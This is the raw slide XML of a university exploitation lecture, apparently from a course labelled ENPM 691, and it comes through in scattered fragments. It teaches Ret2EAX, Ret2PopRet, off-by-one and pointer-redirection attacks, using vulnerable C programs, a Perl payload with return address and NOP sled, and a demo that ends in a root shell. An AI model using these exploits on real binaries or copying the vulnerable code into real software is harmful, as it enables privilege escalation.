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9" r:id="rId3"/>
    <p:sldId id="358" r:id="rId4"/>
    <p:sldId id="309" r:id="rId5"/>
    <p:sldId id="310" r:id="rId6"/>
    <p:sldId id="311" r:id="rId7"/>
    <p:sldId id="312" r:id="rId8"/>
    <p:sldId id="314" r:id="rId9"/>
    <p:sldId id="316" r:id="rId10"/>
    <p:sldId id="317" r:id="rId11"/>
    <p:sldId id="318" r:id="rId12"/>
    <p:sldId id="319" r:id="rId13"/>
    <p:sldId id="320" r:id="rId14"/>
    <p:sldId id="322" r:id="rId15"/>
    <p:sldId id="323" r:id="rId16"/>
    <p:sldId id="324" r:id="rId17"/>
    <p:sldId id="356" r:id="rId18"/>
    <p:sldId id="357" r:id="rId19"/>
    <p:sldId id="359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6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60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06" r:id="rId5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58EA87D-E596-4F52-AB1D-EA7F8DD7F68B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57324C-B17E-4D56-BC19-BCDAA8C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2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DCE44B-5C00-4D45-A74C-63CE893B4BC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9847B9-C735-4CB0-9977-963A1CF51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D5EE-1B66-4E2F-BB3E-5ACF93192307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F5B4-0C14-41CB-A686-DE87AD62A7FA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3AB-CE18-421D-940C-480C5093AF20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E5D-61D5-4CBE-B1AD-8C42FC7F6565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5FE7-D873-44FE-925D-E9B27D07E364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A24B-7277-4C5F-AE48-95B49D3FB8BC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3B5D-7018-4952-B567-384BCED66304}" type="datetime1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EC89-A8C0-42A7-B778-3E99A918316F}" type="datetime1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D11-B8D8-404E-BBFF-9F9289C7B189}" type="datetime1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409-DE6D-45D8-9CDC-88C733509F08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1DE-BEC4-47E0-B6CD-07DD01B8185E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9EAB-C036-4A9B-88B1-B657AD1F1895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4502-7039-408E-B37C-B61C0C04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loit-db.com/papers/13203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Buffer Overflow Exploitation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ENPM 691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Get address of call *%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>eax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885" y="228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[~]$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>objdump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> -d </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>victim_eax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"*%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 80483df:	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> d0                	call   *%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>eax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505200"/>
            <a:ext cx="6150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This address must match the address of call *%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> instruction</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>my $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>retaddr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> = "\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>xdf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>\x83\x04\x08";  #</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>80483df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NOP sled of 60 bytes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26574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Construct </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>argv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209800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7775" y="5486400"/>
            <a:ext cx="322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exploit_eax.pl for full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got the shell as a root!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2438400"/>
            <a:ext cx="38335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[~]$ ./</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>victim_eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> `cat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>payload_eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>`</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t># </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>whoami</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>root</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t># </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="7326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Ret2PopRet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Do not know the address of the buff.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Second argument to a function has a pointer to the buff</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Key idea: Binaries have </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Pop and Ret!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Strategy: Override the return address by</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>the address of a Pop followed by Ret</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Benefit: No worries about the buffer’s address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29988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function(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> x, char*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char buffer[4];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(buffer, 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function(10, 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   return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3053774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i="1" dirty="0" smtClean="0"/>
              <a:t>function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>is done the ESP will point to the first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if we override the return address of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>function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0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pop and ret sequence?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pop will cause the ESP to point to </a:t>
            </a:r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ret will transfer the </a:t>
            </a:r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 to EIP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Shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> pointed by </a:t>
            </a:r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 will execute!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 for a pop ret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Objdump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> –d &lt;binary&gt;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da-DK" dirty="0"/>
              <a:t>80484d8:	5d                   	pop    %ebp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" smtClean="0"/>
              <a:t>80484d9</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0"/>
              <a:t>:	c3                   	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" smtClean="0"/>
              <a:t>ret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smtClean="0"/>
              <a:t>Override the return address by 80484d8</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="da-DK" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" smtClean="0"/>
              <a:t>See exploit_ret2pop.pl for all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Off-by-one is sometimes enough!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200" dirty="0"/>
              <a:t>#include&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="6200" dirty="0" err="1"/>
              <a:t>stdio.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="6200" dirty="0"/>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="6200" dirty="0"/>
              <a:t>#include&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="6200" dirty="0" err="1"/>
              <a:t>string.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="6200" dirty="0"/>
              <a:t>&gt;</a:t>
            </a:r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r>
              <a:rPr lang="en-US" sz="6200" dirty="0"/>
              <a:t>void save(char* </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="6200" dirty="0" err="1"/>
              <a:t>str</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="6200" dirty="0"/>
              <a:t>)</a:t>
            </a:r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/>
              <a:t>   char buff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="6200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>[256]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="6200" dirty="0"/>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="6200" dirty="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="6200" dirty="0" err="1"/>
              <a:t>strncpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="6200" dirty="0"/>
              <a:t>(buff, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="6200" dirty="0" err="1"/>
              <a:t>str</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="6200" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="6200" dirty="0" err="1"/>
              <a:t>strlen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="6200" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="6200" dirty="0" err="1"/>
              <a:t>str</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="6200" dirty="0"/>
              <a:t>)+1);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="6200" dirty="0"/>
              <a:t>}</a:t>
            </a:r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r>
              <a:rPr lang="en-US" sz="6200" dirty="0"/>
              <a:t>void function(char* </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="6200" dirty="0" err="1"/>
              <a:t>str</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="6200" dirty="0"/>
              <a:t>)</a:t>
            </a:r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/>
              <a:t>   save(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="6200" dirty="0" err="1"/>
              <a:t>str</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="6200" dirty="0"/>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="6200" dirty="0"/>
              <a:t>}</a:t>
            </a:r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r>
              <a:rPr lang="en-US" sz="6200" dirty="0" err="1"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="6200" dirty="0"/>
              <a:t> main(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="6200" dirty="0" err="1"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="6200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="6200" dirty="0" err="1"/>
              <a:t>argc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="6200" dirty="0"/>
              <a:t>, char* </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="6200" dirty="0" err="1"/>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="6200" dirty="0"/>
              <a:t>[])</a:t>
            </a:r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 smtClean="0"/>
              <a:t>    if(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="6200" dirty="0" err="1" smtClean="0"/>
              <a:t>strlen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="6200" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="6200" dirty="0" err="1" smtClean="0"/>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="6200" dirty="0" smtClean="0"/>
              <a:t>[1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="6200" dirty="0"/>
              <a:t>]) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="6200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="6200" dirty="0"/>
              <a:t> 256)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="6200" dirty="0"/>
              <a:t>      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="6200" dirty="0" err="1"/>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="6200" dirty="0"/>
              <a:t>("Input out of size.");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="6200" dirty="0"/>
              <a:t>   else</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="6200" dirty="0"/>
              <a:t>      function(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="6200" dirty="0" err="1"/>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="6200" dirty="0"/>
              <a:t>[1]);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="62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Off-by-one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EBP may be corrupted</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>function’s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>EBP one byte will be NULL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>What if the corrupted EBP is a valid address?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>When the control returns to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>function</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>EBP is corrupted</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Leave instruction will reset the ESP to wrong EBP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Ret instruction will thus set EIP to wrong instruction</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Exercise (practice at home)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Techniques to overcome buffer address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Ret2EAX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Ret2PopRet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Off-by-one-error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Redirecting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Pointers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>String pointers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Function pointers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Jump to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libc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Spawn a shell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Hijack the Global Offset Table (GOT)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Spawn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shell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Hacking: The Art of Exploitation – Chapter 6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www.exploit-db.com/wp-content/themes/exploit/docs/28553.pdf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www.exploit-db.com/papers/13203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ASLR </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Smack &amp; Laugh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String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5562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#include &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2500" dirty="0" err="1"/>
              <a:t>stdio.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2500" dirty="0" smtClean="0"/>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2500" dirty="0" smtClean="0"/>
              <a:t>#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2500" dirty="0"/>
              <a:t>include &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2500" dirty="0" err="1"/>
              <a:t>string.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2500" dirty="0" smtClean="0"/>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2500" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2500" dirty="0" err="1" smtClean="0"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2500" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2500" dirty="0"/>
              <a:t>main(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argc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2500" dirty="0"/>
              <a:t>, char* </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2500" dirty="0" err="1"/>
              <a:t>args</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2500" dirty="0"/>
              <a:t>[]){ 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char </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2500" dirty="0"/>
              <a:t>input[256]; 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char </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2500" dirty="0"/>
              <a:t>*</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2500" dirty="0" err="1"/>
              <a:t>conf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2500" dirty="0"/>
              <a:t> = "test -f ~/.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2500" dirty="0" err="1"/>
              <a:t>progrc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2500" dirty="0"/>
              <a:t>"; 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char </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2500" dirty="0"/>
              <a:t>*license = "THIS SOFTWARE IS ...";  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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2500" dirty="0" err="1" smtClean="0"/>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2500" dirty="0" smtClean="0"/>
              <a:t>(license</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2500" dirty="0"/>
              <a:t>); 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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2500" dirty="0" err="1" smtClean="0"/>
              <a:t>strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2500" dirty="0" smtClean="0"/>
              <a:t>(input</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2500" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2500" dirty="0" err="1"/>
              <a:t>args</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2500" dirty="0"/>
              <a:t>[1]);  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if </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2500" dirty="0"/>
              <a:t>(system(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2500" dirty="0" err="1"/>
              <a:t>conf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2500" dirty="0"/>
              <a:t>))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dirty="0" err="1" smtClean="0"/>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2500" dirty="0"/>
              <a:t>("Missing . </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2500" dirty="0" err="1"/>
              <a:t>progrc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2500" dirty="0" smtClean="0"/>
              <a:t>");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2500" dirty="0" smtClean="0"/>
              <a:t>}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3434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if we can redirect the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>conf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> pointer to the license?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ystem (“THIS”)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Assembly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4445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0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Stack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64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 add to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>libc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Old EBP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 err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>[1]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27432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23738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45720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2026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EBP-5</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Curved Left Arrow 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="2895600" y="3940444"/>
            <a:ext cx="457200" cy="21232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buffer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5951" y="3928764"/>
            <a:ext cx="1587795" cy="6432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Buffer (256 bytes)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1219200" y="3276600"/>
            <a:ext cx="1629835" cy="6432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License </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>ptr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219200" y="2743200"/>
            <a:ext cx="1629835" cy="6432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Conf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200" y="3352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4890" y="2983468"/>
            <a:ext cx="6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2765" y="38862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000" y="351686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String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 format (on my machine)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Fill Buffer (256)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Address </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>of l</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>icense (4 bytes)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Address </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>license </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>redirect </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>conf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> by license)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0"/>
              <a:t>./</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1"/>
              <a:t>strptr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0"/>
              <a:t> `</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1"/>
              <a:t>perl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0"/>
              <a:t> -e 'print "A"x256</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>; print</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0"/>
              <a:t>"\x82\x85\x04\x08";print"\x82\x85\x04\x08</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>"'`</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>0x08048582 (address of license)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THIS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524001"/>
            <a:ext cx="38100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echo "Hi I hacked it</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>...“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3810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2971800"/>
            <a:ext cx="3116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this text into a THIS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the path to the THIS file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6642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Function Pointers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49489"/>
            <a:ext cx="39934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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>include &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>string.h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r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>void </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>function(char* </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>str</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>) {       </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean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/>
              <a:t>("%s\n", </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>str</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>);     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system</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>("any command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char** </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>argv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{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void (*</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>ptr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>)(char* </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>str</a:t>
            </a:r>
            <a:r>
